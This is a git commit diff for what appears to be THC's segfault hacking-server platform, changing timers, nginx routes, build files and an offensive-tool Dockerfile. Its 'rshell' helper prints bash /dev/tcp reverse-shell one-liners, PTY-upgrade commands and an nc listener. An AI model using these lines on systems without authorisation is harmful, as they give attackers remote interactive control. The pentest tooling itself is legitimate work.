guest docker bumping

2024-06-16 11:58:43 +00:00 · 2024-01-20 20:44:05 +00:00 · 2024-01-20 20:44:05 +00:00 · 44f0018fff
commit 44f0018fff
parent fc10201e80
21 changed files with 324 additions and 264 deletions
--- a/5
+++ b/5
@ -1,7 +1,10 @@
 0.5.4 - 2023-02-00
    * OpenSSH 9.6p1
    * rshell
    * sploitscan
-    * OpenVPN (curl sf/vpn)
+    * OpenVPN (curl sf/ovpn)
    * Different auto-shutdown timers for FREE and TOKEN users
    * Syscop login message after auto-shutdown
 0.5.2 - 2023-12-00
    * Kali 2023.4
--- a/4
+++ b/4
@ -119,6 +119,7 @@ FILES_PROVISION += "segfault-$(VER)/provision/update.sh"
 FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile"
 FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile"
 FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh"
 FILES_ENCFSD += "segfault-$(VER)/encfsd/funcs_destructor.sh"
 FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh"
 FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh"
@ -137,6 +138,7 @@ FILES_GSNC += "segfault-$(VER)/gsnc/sf-gsnc.sh"
 FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf"
 FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf"
 FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf"
 FILES_CONFIG += "segfault-$(VER)/config/etc/sf/timers.conf"
 FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf"
 FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt"
 FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf"
@ -156,7 +158,7 @@ FILES_ROOT += "segfault-$(VER)/sfbin/funcs.sh"
 FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh"
 FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh"
 FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh"
-FILES_ROOT += "segfault-$(VER)/sfbin/funcs_vpn.sh"
+FILES_ROOT += "segfault-$(VER)/sfbin/funcs_ovpn.sh"
 FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh"
 FILES_ROOT += "segfault-$(VER)/sfbin/sf"
 FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh"
--- a/config/etc/nginx/nginx-rpc.conf
+++ b/config/etc/nginx/nginx-rpc.conf
@ -69,13 +69,15 @@ http {
 		gzip off;
 		location / {
-			try_files $uri $uri/ = 404;
+			#try_files $uri $uri/ = 404;
-			rewrite /net   /net/;
+			rewrite ^/net$   /net/ last;
-			rewrite /vpn   /vpn/;
+			rewrite ^/ovpn$  /ovpn/ last;
-			rewrite /wg    /wg/;
+			rewrite ^/vpn$   /ovpn/ last;
-			rewrite /dmesg /dmesg/;
+			rewrite ^/wg$    /wg/ last;
-			rewrite /port  /port/;
+			rewrite ^/dmesg$ /dmesg/ last;
-			rewrite /set   /set/;
+			rewrite ^/port$  /port/ last;
 			rewrite ^/set$   /set/ last;
 			rewrite ^/vpn/(.*)$  /ovpn/$1 last;
 			location ~* ^/set/.* {
 				fastcgi_param REMOTE_ADDR        $remote_addr;
@ -101,11 +103,11 @@ http {
 				fastcgi_param SCRIPT_FILENAME    /cgi-bin/rpc;
 				fastcgi_pass  unix:/dev/shm/sf/master/fcgiwrap.socket;
 			}
-			location ~* ^/vpn/.* {
+			location ~* ^/ovpn/.* {
 				fastcgi_param REMOTE_ADDR        $remote_addr;
 				fastcgi_param REQUEST_URI        $request_uri;
 				fastcgi_param REQUEST_BODY       $request_body;
-				fastcgi_param FCGI_CMD           vpn;
+				fastcgi_param FCGI_CMD           ovpn;
 				fastcgi_param SCRIPT_FILENAME    /cgi-bin/rpc;
 				fastcgi_pass  unix:/dev/shm/sf/master/fcgiwrap.socket;
 			}
--- a/config/etc/sf/timers.conf
+++ b/config/etc/sf/timers.conf
@ -0,0 +1,6 @@
 #SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
 #SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
 #SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
 #SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
--- a/docker-compose.yml
+++ b/docker-compose.yml
@ -40,7 +40,7 @@ services:
    devices:
      - "/dev/fuse:/dev/fuse"
    volumes:
-      - "${SF_BASEDIR:-.}/config/db:/config/db:ro"
+      - "${SF_BASEDIR:-.}/config/db:/config/db:rw"
      - "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
      - "${SF_BASEDIR:-.}/data:/encfs/raw"
      - "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
@ -76,6 +76,7 @@ services:
      - "/dev/fuse:/dev/fuse"
    volumes:
      - "${SF_BASEDIR:-.}/config/db:/config/db:ro"
      - "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
      - "${SF_BASEDIR:-.}/data:/encfs/raw"
      - "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest"
      - "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
--- a/encfsd/Dockerfile
+++ b/encfsd/Dockerfile
@ -9,4 +9,4 @@ RUN apk add --no-cache --upgrade \
 		encfs \
 		redis \
 		xfsprogs-extra
-COPY destructor.sh encfsd.sh portd.sh /
+COPY destructor.sh funcs_destructor.sh encfsd.sh portd.sh /
--- a/encfsd/destructor.sh
+++ b/encfsd/destructor.sh
@ -3,149 +3,28 @@
 # shellcheck disable=SC1091 # Do not follow
 source /sf/bin/funcs.sh
 source /sf/bin/funcs_redis.sh
-		
+
-SF_TIMEOUT_WITH_SHELL=604800
+# Defaults		
-SF_TIMEOUT_NO_SHELL=129600
+SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
 SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
 SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
 SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
 [[ -n $SF_DEBUG ]] && {
-	SF_TIMEOUT_WITH_SHELL=180
+	SF_TIMEOUT_WITH_SHELL=60
-	SF_TIMEOUT_NO_SHELL=120
+	SF_TIMEOUT_NO_SHELL=15
-}
+	SF_TIMEOUT_TOKEN_WITH_SHELL=120
-
+	SF_TIMEOUT_TOKEN_NO_SHELL=90
 # [LID] <1=encfs> <1=Container> <message>
 # Either parameter can be "" to not stop encfs or lg-container 
 stop_lg()
 {
 	local is_encfs
 	local is_container
 	local lid
 	local ts_born
 	lid="$1"
 	ts_born="$2"
 	is_encfs="$3"
 	is_container="$4"
 	LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
 	red RPUSH portd:cmd "remport ${lid}" >/dev/null
 	rm -f "/sf/run/encfsd/user/lg-${lid}"
 	rm -f "/sf/run/pids/lg-${lid}.pid"
 	rm -f "/sf/run/ips/lg-${lid}.ip"
 	rm -rf "/config/self-for-guest/lg-${lid}"
 	rm -rf "/sf/run/users/lg-${lid}"
 	# Kill the OpenVPN process (if running)
 	docker exec sf-master killall "openvpn-$lid" 2>/dev/null
 	docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null 
 	# Tear down container
 	[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
 	# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
 	# inside the container even that we never moved it into the container's
 	# Process Namespace. EncFS will also die when the lg- is shut down.
 	# This is only neede for cgroup1:
 	[[ -n $is_encfs ]] && {
 		pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
 		# Give kernel time to unmount mountpoint
 		sleep 1
 	}
 	# Do not use 'rm -rf' here as this might still be a mounted drive
 	# when encfsd is not killed fast enough (failing to delete is acceptable).
 	rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
 	rmdir "/encfs/sec/lg-${lid}"
 }
 # [lg-$LID]
 # Check if lg- is running and
 # 1. EncFS died
 # 2. Container should be stopped (stale, idle)
 check_container()
 {
 	local c
 	local lid
 	local i
 	local IFS
 	local fn
 	local comm
 	local ts_logout
 	local ts_born
 	IFS=$'\n'
 	c="$1"
 	lid="${c#lg-}"
 	[[ ${#lid} -ne 10 ]] && return
 	ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
 	# Skip if EncFS only started recently (zsh not yet started).
 	[[ $((NOW - ts_born)) -lt 20 ]] && return 0
 	# Check if EncFS is still running.
 	pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
 		# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
 		stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
 		return
 	}
 	# ts_logout may not exist (stale)
 	ts_logout=0
 	fn="/config/db/user/lg-${lid}/ts_logout"
 	[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn") 
 	# Check if there is still a shell running inside the container:
 	IFS=""
 	set -o pipefail
 	comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
 		# HERE: lg died or top failed.
 		set +o pipefail
 		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
 		return
 	}
 	set +o pipefail
 	# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
 	# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
 	# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
 	# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
 	# FIXME: many stale is_logged_in exists without ssh connected ;/
 	# HERE: LG & EncFS are running.
 	echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
 		# HERE: User still has shell running
 		[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
 		[[ $((NOW - ts_logout)) -lt ${SF_TIMEOUT_WITH_SHELL} ]] && return
 		# HERE: Not logged in. logged out more than 1 week ago.
 		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
 		return
 	}
 	# HERE: No shell running, ts_logout=0 if never logged out
 	# Skip if only recently logged out.
 	[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
 	# Filter out stale processes
 	echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
 		# HERE: Nothing running but stale processes
 		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
 		return
 	}
 	# HERE: Something running (but no shell, and no known processes)
 	[[ $((NOW - ts_logout)) -ge ${SF_TIMEOUT_NO_SHELL} ]] && {
 		# User logged out 1.5 days ago. No shell. No known processes.
 		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${SF_TIMEOUT_NO_SHELL}sec (no shell running)."
 		return
 	}
 	# HERE: No shell. No known processes. Less than 1.5 days ago.
 }
 [[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock"
 source /funcs_destructor.sh || ERREXIT 255
 export REDISCLI_AUTH="${SF_REDIS_AUTH}"
 while :; do
 	sleep 30
 	source /config/etc/sf/timers.conf 2>/dev/null
 	source /funcs_destructor.sh 2>/dev/null
 	NOW=$(date +%s)
 	# Every 30 seconds check all container we are tracking (from encfsd)
 	containers=($(cd /sf/run/encfsd/user && echo lg-*))
--- a/encfsd/funcs_destructor.sh
+++ b/encfsd/funcs_destructor.sh
@ -0,0 +1,153 @@
 # [LID] <1=encfs> <1=Container> <message>
 # Either parameter can be "" to not stop encfs or lg-container 
 stop_lg()
 {
 	local is_encfs
 	local is_container
 	local lid
 	local ts_born
 	lid="$1"
 	ts_born="$2"
 	is_encfs="$3"
 	is_container="$4"
 	LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
 	red RPUSH portd:cmd "remport ${lid}" >/dev/null
 	rm -f "/sf/run/encfsd/user/lg-${lid}"
 	rm -f "/sf/run/pids/lg-${lid}.pid"
 	rm -f "/sf/run/ips/lg-${lid}.ip"
 	rm -rf "/config/self-for-guest/lg-${lid}"
 	rm -rf "/sf/run/users/lg-${lid}"
 	# Kill the OpenVPN process (if running)
 	docker exec sf-master killall "openvpn-$lid" 2>/dev/null
 	docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null 
 	# Tear down container
 	[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
 	# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
 	# inside the container even that we never moved it into the container's
 	# Process Namespace. EncFS will also die when the lg- is shut down.
 	# This is only neede for cgroup1:
 	[[ -n $is_encfs ]] && {
 		pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
 		# Give kernel time to unmount mountpoint
 		sleep 1
 	}
 	# Do not use 'rm -rf' here as this might still be a mounted drive
 	# when encfsd is not killed fast enough (failing to delete is acceptable).
 	rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
 	rmdir "/encfs/sec/lg-${lid}"
 }
 try_syscop_msg() {
 	local lid="$1"
 	echo -en "\
 🤷‍♂️ ${CDM}Your server shut down automatically because you did not log in for $(( (NOW - ts_logout) / 60 / 60 )) h.
 🫵 Please type ${CDC}halt${CDM} to stop your server or...
 ❤️  ...get a ${CM}TOKEN${CDM} to stop this message: ${CUL}${CB}https://thc.org/sf/token${CN}${CDM}
 🌈 ${CW}Yours sincerely, The SysCops 😘 ${CN}
 ">"/config/db/user/lg-${lid:?}/syscop-msg.txt"
 }
 # [lg-$LID]
 # Check if lg- is running and
 # 1. EncFS died
 # 2. Container should be stopped (stale, idle)
 check_container()
 {
 	local c
 	local lid
 	local IFS=$'\n'
 	local fn
 	local comm
 	local ts_logout
 	local ts_born
 	local to_with_shell=$SF_TIMEOUT_WITH_SHELL
 	local to_no_shell=$SF_TIMEOUT_NO_SHELL
 	local is_token
 	c="$1"
 	lid="${c#lg-}"
 	[[ ${#lid} -ne 10 ]] && return
 	ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
 	# Skip if EncFS only started recently (zsh not yet started).
 	[[ $((NOW - ts_born)) -lt 20 ]] && return 0
 	# Check if EncFS is still running.
 	pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
 		# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
 		stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
 		return
 	}
 	# ts_logout may not exist (stale)
 	ts_logout=0
 	fn="/config/db/user/lg-${lid}/ts_logout"
 	[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn") 
 	# Check if there is still a shell running inside the container:
 	IFS=""
 	set -o pipefail
 	comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
 		# HERE: lg died or top failed.
 		set +o pipefail
 		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
 		return
 	}
 	# Load timers
 	[[ -e "/config/db/user/lg-${lid}/token" ]] && {
 		to_with_shell=$SF_TIMEOUT_TOKEN_WITH_SHELL
 		to_no_shell=$SF_TIMEOUT_TOKEN_NO_SHELL
 		is_token=1
 	}
 	set +o pipefail
 	# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
 	# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
 	# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
 	# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
 	# FIXME: many stale is_logged_in exists without ssh connected ;/
 	# HERE: LG & EncFS are running.
 	echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
 		# HERE: User still has shell running
 		[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
 		[[ $((NOW - ts_logout)) -lt ${to_with_shell} ]] && return
 		# HERE: Not logged in. logged out more than 1 week ago.
 		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
 		[[ -z $is_token ]] && try_syscop_msg "$lid"
 		return
 	}
 	# HERE: No shell running, ts_logout=0 if never logged out
 	# Skip if only recently logged out.
 	[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
 	# Filter out stale processes
 	echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
 		# HERE: Nothing running but stale processes
 		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
 		return
 	}
 	# HERE: Something running (but no shell, and no known processes)
 	[[ $((NOW - ts_logout)) -ge ${to_no_shell} ]] && {
 		# User logged out 1.5 days ago. No shell. No known processes.
 		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${to_no_shell}sec (no shell running)."
 		[[ -z $is_token ]] && try_syscop_msg "$lid"
 		return
 	}
 	# HERE: No shell. No known processes. Less than 1.5 days ago.
 }
--- a/guest/Dockerfile
+++ b/guest/Dockerfile
@ -614,11 +614,11 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
 	&& /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit   `# x86_64 only, spirit-arm bad` \
 	&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \
 		&& mkdir -p /usr/share/gf \
-		&& svn export https://github.com/tomnomnom/gf/trunk /tmp/gf \
+		&& git clone --depth 1 https://github.com/tomnomnom/gf.git /tmp/gf \
 		&& mv /tmp/gf/examples/*.json /usr/share/gf \
 		&& mv /tmp/gf/gf-completion.* /usr/share/gf \
 		&& rm -rf /tmp/gf \
-		&& svn export https://github.com/1ndianl33t/Gf-Patterns/trunk/ /tmp/gf \
+		&& git clone --depth 1 https://github.com/1ndianl33t/Gf-Patterns.git /tmp/gf \
 		&& mv /tmp/gf/*.json /usr/share/gf; }' \
 	&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \
 	&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \
@ -631,7 +631,8 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
 		&& cmake . \
 		&& make \
 		&& cp urldedupe /usr/bin; }' \
-	&& /pkg-install.sh HACK bash -c '{ svn export https://github.com/urbanadventurer/username-anarchy/trunk /opt/username-anarchy; }' \
+	&& /pkg-install.sh HACK bash -c '{ git clone --depth 1 https://github.com/urbanadventurer/username-anarchy.git /opt/username-anarchy \
 		&&  rm -rf /opt/username-anarchy/.git*; }' \
 	&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \
 	&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \
 	&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \
@ -802,8 +803,8 @@ RUN /pkg-install.sh HACK ghbin ekzhang/bore  '%arch:aarch64=arm%-unknown-linux'
 	&& /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb'            `# x86_64 only` \
 	&& /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py'                    sploitscan \
 	&& /pkg-install.sh HACK ghbin hueristiq/xurlfind3r               'linux_%arch:x86_64=amd64:aarch64=arm64%'   xurlfind3r
-RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker                       'linux'                                     kalker \
+RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker                       'linux'                                     kalker
-	&& /pkg-install.sh LARGE ghbin PowerShell/PowerShell  'deb_%arch1%.deb'
+ ## YANKED. Already in apt-get install powershell/pkg-install.sh LARGE ghbin PowerShell/PowerShell  'deb_%arch1%.deb'
 RUN	/pkg-install.sh HACK bash -c '{  wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \
 		&& chmod 755 /usr/bin/favfreak.py \
 		&& ln -s favfreak.py /usr/bin/FavFreak; }' \
--- a/guest/fs-root/etc/shellrc
+++ b/guest/fs-root/etc/shellrc
@ -293,8 +293,10 @@ alias nocol=noansi
 # Make the Project name visibile in the PS1 prompt
 [[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}"
-PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:$PATH"
+
 PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:/usr/local/go/bin:$PATH"
 [[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples"
 export PATH
 _sf_info_non_perm()
 {
--- a/guest/fs-root/sf/bin/rshell
+++ b/guest/fs-root/sf/bin/rshell
@ -16,31 +16,31 @@ ERREXIT() {
    exit "${code:-99}"
 }
 [[ ! -f /config/self/reverse_port ]] && curl sf/port
 load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
 load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
 echo -e "\
-Use any of these commands on the remote system:${CDR}
+Use one of these commands on the remote system:
-    bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'
+    1. ${CDR}bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'${CN}
-    (bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &
+    2. ${CDR}(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &${CN}
-${CN}
+${CN}Once connected, cut & paste the following into the _this_ shell:
-Once connected, cut & paste this into the remote shell:${CDC}
+${CF}-------------------------------------------------------------------------------${CDC}
 command -v python >/dev/null \\
-  && exec python -c 'import pty; pty.spawn(\"bash\")' \\
+    && exec python -c 'import pty; pty.spawn(\"bash\")' \\
-  || exec script -qc bash /dev/null
+    || exec script -qc bash /dev/null
-
+export SHELL=/bin/bash TERM=xterm-256color
 export SHELL=/bin/bash
 export TERM=xterm-256color
 reset -I
 PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'
 "'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'"
-${CN}To force-exit this shell, type ${CDY}kill \"\$(pgrep -P $$)\"${CN}
+${CN}${CF}-------------------------------------------------------------------------------${CN}
-----------------------------------"
+To force-exit this listener, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} on your Root Server"
 # PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
 cfg=$(stty --save)
 stty raw  -echo opost
-time nc -vnlp "$rport"
+echo -e "${CDG}Listening on ${CG}${rip}:${rport}${CN}"
-echo "Restoring TTY"
+nc -nlp "$rport"
 echo "🦋 Restoring terminal..."
 stty "$cfg"
 # reset -I
--- a/host/Makefile
+++ b/host/Makefile
@ -1,29 +1,34 @@
 VER=9.6p1
 all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile
 	docker build --no-cache --network host -t sf-host .
 albuild:
-	bash -c "docker run --rm alpine-gcc true || \
+	bash -c "docker run --rm sf-alpine-gcc true || \
-		docker commit alpine-gcc alpine-gcc || { \
+		docker commit sf-alpine-gcc sf-alpine-gcc || { \
-		docker run --network host --name alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
+		docker run --network host --name sf-alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
-		&& docker commit alpine-gcc alpine-gcc; }"
+		&& docker commit sf-alpine-gcc sf-alpine-gcc; }"
 # See mk_sshd.sh for manual debugging
-fs-root/usr/sbin/sshd: sf-sshd.patch mk_sshd.sh
+fs-root/usr/sbin/sshd: albuild sf-sshd.patch mk_sshd.sh
-	docker run --rm -v$$(pwd):/src --net=host -w /tmp alpine-gcc /src/mk_sshd.sh
+	docker run --rm -v$$(pwd):/src --net=host -w /tmp --env VER=$(VER) sf-alpine-gcc /src/mk_sshd.sh
 	@echo "Type 'make diff' to create a sf-sshd-$(VER).patch"
 fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c
-	docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
+	docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
 	@echo SUCCESS
 fs-root/bin/unix-socket-client: unix-socket-client.c
-	docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
+	docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
 	@echo SUCCESS
 diff:
 	cd dev && \
-	diff -x '!*.[ch]' -u   openssh-9.2p1-orig/  openssh-9.2p1-sf/  | grep -Ev ^"(Only in|Common)" >../sf-sshd.patch
+	diff -x '!*.[ch]' -u   openssh-$(VER)-orig/  openssh-$(VER)-sf/  | grep -Ev ^"(Only in|Common)" >../sf-sshd-$(VER).patch
 	@echo "May want to 'mv sf-sshd-$(VER).patch sf-sshd.patch'."
 clean:
-	rm -rf openssh-9.2p1-sf fs-root/usr/sbin/sshd
+	rm -rf openssh-$(VER)-orig openssh-$(VER)-sf fs-root/usr/sbin/sshd
-	docker image rm alpine-gcc
+	docker image rm sf-alpine-gcc
--- a/host/fs-root/bin/segfaultsh
+++ b/host/fs-root/bin/segfaultsh
@ -424,7 +424,7 @@ print_goodbye()
 	# Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick
 	# Note: pgrep is executed in user's context. Treat the output with care and do not trust it.
-	n=$(bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
+	n=$(timeout 2 bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
 	[[ -z "$n" ]] && n=0
 	[[ ${#n} -gt 5 ]] && n=0
 	[[ ! $n -eq $n ]] && n=0
@ -435,7 +435,7 @@ print_goodbye()
 		str="process is"
 		[[ "$n" -gt 1 ]] && str="processes are"
 		echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}"
-		exec_errnull docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *}        "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
+		exec_errnull timeout 2 docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *}        "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
 		echo -e "\
 -------> The encrypted filesystem in /sec will remain accessible until
 -------> the last shell exits or all background processes terminate.
@ -443,16 +443,6 @@ print_goodbye()
 -------> This will also make /sec unavailabe until your next log in."
 	fi
 	echo -en "\r"
 	[[ -z $SF_IS_PAYING ]] && {
 		echo -e "\
 ${CDY}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@   ${CDG}** GET MORE MEMORY, SPEED, STORAGE AND NO RESTRICTIONS **${CDY}   @@@
@@@             ${CDR}${CUL}https://www.thc.org/segfault/free${CN}${CDY}                 @@@
@@@             ${CB}${CUL}https://www.thc.org/segfault/upgrade${CN}${CDY}              @@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@${CN}"
 	}
 	sysmsg "/config/host/etc/logoutmsg-all.sh"
 	echo -e "\
@ -536,7 +526,7 @@ spawn_shell_exit()
 	tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip"
 	[[ -n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip"
 	# Request a reverse Port Forward
